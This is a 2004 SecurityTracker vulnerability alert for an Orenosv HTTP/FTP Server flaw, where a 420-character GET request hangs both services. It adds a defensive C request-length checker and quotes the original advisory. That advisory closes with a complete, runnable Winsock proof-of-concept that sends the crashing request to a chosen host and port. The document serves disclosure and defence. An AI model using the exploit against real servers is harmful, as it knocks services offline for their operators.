SecurityTracker.com
Category:   Application (Web Server/CGI)  >   Orenosv HTTP/FTP Server
Vendors:   Kataoka, Masato
Orenosv HTTP/FTP Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1010289
SecurityTracker URL:  http://securitytracker.com/id/1010289
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 26 2004
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 0.5.9f
Description:   badpack3t of SP Research Labs reported a vulnerability in Orenosv Server. A remote user can cause the web and FTP service to stop responding.

It is reported that a remote user can send a specially crafted HTTP GET request for a resource of 420 characters to cause the HTTP service and the FTP service to stop processing traffic.

A demonstration exploit is provided in the Source Message.

The original advisory is available at:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Impact:   A remote user can cause the application to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  hp.vector.co.jp/authors/VA027031/orenosv/index_en.html
Cause:   Boundary error
Underlying OS:  Windows (NT), Windows (2000), Windows (XP)

Message History:   None.
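
The entry gives the cause as a boundary error and lists no vendor fix, so the practical control is a length check on the request target before the request reaches the server. The following is an added example, not code from the advisory or from the vendor: check_request_line(), make_sample() and the 255-byte limit are assumptions chosen for illustration, and Orenosv's own parsing code is not shown on this page.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Assumed policy: the advisory only says a 420-character resource hangs the
   server, so this sample limit is set well below that. */
#define MAX_TARGET_LEN 255
#define MAX_LINE_LEN   8192
enum verdict { REQ_OK = 0, REQ_INCOMPLETE = 1, REQ_BAD = 400, REQ_URI_TOO_LONG = 414 };

/* Classify the request line of a raw HTTP request in buf[0..len). Only
   lengths are compared: nothing is copied into a fixed-size buffer and
   buf need not be NUL-terminated. */
enum verdict check_request_line(const char *buf, size_t len)
{
    const char *eol = memchr(buf, '\n', len), *sp1, *sp2;
    size_t line_len, tlen;

    if (eol == NULL)            /* no complete line yet: cap what we will wait for */
        return len > MAX_LINE_LEN ? REQ_URI_TOO_LONG : REQ_INCOMPLETE;
    line_len = (size_t)(eol - buf);
    if (line_len > 0 && buf[line_len - 1] == '\r') line_len--;
    sp1 = memchr(buf, ' ', line_len);                 /* end of method */
    if (sp1 == NULL || sp1 == buf) return REQ_BAD;
    sp1++;
    sp2 = memchr(sp1, ' ', line_len - (size_t)(sp1 - buf));
    /* no version token (HTTP/0.9 style): target runs to end of line */
    tlen = sp2 ? (size_t)(sp2 - sp1) : line_len - (size_t)(sp1 - buf);
    if (tlen == 0 || sp1[0] != '/') return REQ_BAD;   /* origin-form only */
    if (tlen > MAX_TARGET_LEN || line_len > MAX_LINE_LEN) return REQ_URI_TOO_LONG;
    return REQ_OK;
}

static char sample[600];        /* constructed input, not captured traffic */
size_t make_sample(size_t fill) /* "GET /" + fill x's + " HTTP/1.0", returns length */
{
    if (fill > 512) fill = 512;
    memcpy(sample, "GET /", 5);
    memset(sample + 5, 'x', fill);
    memcpy(sample + 5 + fill, " HTTP/1.0\r\n\r\n", 13);
    return 5 + fill + 13;
}

int main(void)
{
    printf("420-char resource: %d\n", (int)check_request_line(sample, make_sample(420)));
    printf("10-char resource:  %d\n", (int)check_request_line(sample, make_sample(10)));
    return 0;
}
```

A filtering front end would answer 414 or 400 itself and forward only REQ_OK requests; the same length test applied to the request field of an access log flags past attempts.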


 Source Message Contents

Subject:  Orenosv HTTP/FTP Server Denial Of Service



Please publish:

http://security-protocols.com/modules.php?name=News&file=article&sid=1987

Or the attached advisory.

Thanks,

----------------------------------------
badpack3t
www.security-protocols.com
----------------------------------------





SP Research Labs Advisory x13
-----------------------------

Orenosv HTTP/FTP Server Denial Of Service
-----------------------------------------

Versions:
orenosv059f

Vendor:
http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

Date Released - 5.25.2004

------------------------------------
Product Description from the vendor:

Orenosv is an HTTP/FTP/FTPS server running on Windows NT 4.0, Windows 2000 and Windows XP platforms.
Orenosv is a freely distributable software.

--------
Details:

A specifically crafted HTTP GET request which contains 420 A's will cause the HTTP and FTP service
to stop responding.  

--------
Exploit:

Attached to this advisory is very basic PoC code which only causes the orenosv service to crash.

--------------
Tested on: 
WindowsXP SP1

peace out,

--------------------------
badpack3t
www.security-protocols.com
--------------------------

/****************************
   PoC to crash the server
 ****************************/

/* Orenosv HTTP/FTP Server Denial Of Service
   
   Version:
   orenosv059f
  
   Vendor:
   http://hp.vector.co.jp/authors/VA027031/orenosv/index_en.html

   Coded and Discovered by:
   badpack3t <badpack3t@security-protocols.com>
   .:sp research labs:.
   www.security-protocols.com
   5.25.2004
 */

#include <winsock2.h>
#include <stdio.h>
#include <stdlib.h>   /* exit, atoi */
#include <string.h>   /* memcpy */

#pragma comment(lib, "ws2_32.lib")

char exploit[] = 

/* 420 A's - looks ugly but owell */
"GET /AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n"; 

int main(int argc, char *argv[])
{
	WSADATA wsaData;
	WORD wVersionRequested;
	struct hostent  *pTarget;
	struct sockaddr_in 	sock;
	char *target;
	int port,bufsize;
	SOCKET mysocket;
	
	if (argc < 2)
	{
		printf("Orenosv HTTP/FTP Server DoS by badpack3t\r\n\r\n");
		printf("Usage:\r\n %s <targetip> [targetport] (default is 9999)\r\n\r\n", argv[0]);
		printf("www.security-protocols.com\r\n\r\n");
		exit(1);
	}

	wVersionRequested = MAKEWORD(1, 1);
	/* WSAStartup returns 0 on success and a nonzero error code on failure */
	if (WSAStartup(wVersionRequested, &wsaData) != 0) return -1;

	target = argv[1];
	port = 9999;

	if (argc >= 3) port = atoi(argv[2]);
	bufsize = 1024;
	if (argc >= 4) bufsize = atoi(argv[3]);

	mysocket = socket(AF_INET, SOCK_STREAM, 0);
	if(mysocket==INVALID_SOCKET)
	{	
		printf("Socket error!\r\n");
		exit(1);
	}

	printf("Resolving Hostnames...\n");
	if ((pTarget = gethostbyname(target)) == NULL)
	{
		printf("Resolve of %s failed\n", argv[1]);
		exit(1);
	}

	memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
	sock.sin_family = AF_INET;
	sock.sin_port = htons((USHORT)port);

	printf("Connecting...\n");
	if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) )))
	{
		printf("Couldn't connect to host.\n");
		exit(1);
	}

	printf("Connected!...\n");
	printf("Sending Payload...\n");
	if (send(mysocket, exploit, sizeof(exploit)-1, 0) == -1)
	{
		printf("Error Sending the Exploit Payload\r\n");
		closesocket(mysocket);
		exit(1);
	}

	printf("Payload has been sent! Check if the webserver is dead.\r\n");
	closesocket(mysocket);
	WSACleanup();
	return 0;
}
